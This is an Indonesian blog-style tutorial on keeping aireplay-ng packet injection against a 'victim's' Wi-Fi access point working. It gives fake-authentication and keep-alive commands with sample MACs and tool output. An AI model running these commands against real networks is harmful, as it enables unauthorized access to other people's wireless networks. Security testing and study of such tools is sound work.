Failed injection packet to AP

Pernah ketemu kasus seperti ini ketika lagi asik-asiknya menginjeksi paket di jaringan wireless?

Saving ARP requests in replay_arp-0123-104950.cap
You should also start airodump-ng to capture replies.
Notice: got a deauth/disassoc packet. Is the source MAC associated ?
Notice: got a deauth/disassoc packet. Is the source MAC associated ?
Read 17915 packets (got 3 ARP requests), sent 5854 packets...

Yup, kasus tersebut terjadi karena alamat MAC korban tidak lagi berasosiasi dengan Access Point setempat atau bisa dibilang lagi putus-putus, entah akibat proses de-authentication yang kita buat sendiri atau memang sinyalnya ga bagus untuk sampai di laptop/pc korban. Nah, untuk menyiasatinya ada 3 cara:

  1. Ganti dengan alamat MAC korban yang lain.
  2. Pancing dengan 1 kartu jaringan wireless lain (musti ada 2 buah kartu jaringan)
  3. Bikin fake authentication ke AP

Untuk cara yang pertama cukup mudah, tinggal matikan proses aireplay-ng yang sedang berjalan, lalu ganti dengan alamat MAC korban yang tergabung dalam satu AP yang sama. Pada cara yang kedua, kita tinggal menghidupkan kartu jaringan yang kedua (biasanya PCMCIA/USB card) lalu kirimkan paket ke AP atau cukup dengan mengirimkan ping ke internet. Yang mau saya bahas disini adalah cara ketiga, yaitu dengan membuat fake authentication ke AP, caranya:

aireplay-ng -1 0 -e <SSID> -a <bssid MAC address> -h <source MAC address> wifi0
aireplay-ng -1 0 -e linksys -a 00:18:F8:E1:76:BD -h 00:0F:54:3C:65:93 wifi0

Kalau sukses akan terlihat seperti ini:

18:18:20 Sending Authentication Request
18:18:20 Authentication successful
18:18:20 Sending Association Request
18:18:20 Association successful :-)

Atau dengan cara lain untuk keep-alive packet injection seperti ini:

aireplay-ng -1 6000 -o 1 -q 10 -e linksys -a 00:18:F8:E1:76:BD -h 00:0F:54:3C:65:93 wifi0

yang berarti:

  • 6000 – Melakukan re-autentikasi setiap 6000 detik.
  • -o 1 – Hanya mengirim satu paket untuk satu waktu.
  • -q 10 – Mengirim paket keep-alive setiap 10 detik.

hasilnya akan seperti ini:

18:22:32 Sending Authentication Request
18:22:32 Authentication successful
18:22:32 Sending Association Request
18:22:32 Association successful :-)
18:22:42 Sending keep-alive packet
18:22:52 Sending keep-alive packet

# dan seterusnya.
Selanjutnya kita bisa melanjutkan proses injeksi paket di jaringan wireless tersebut dengan santai ^^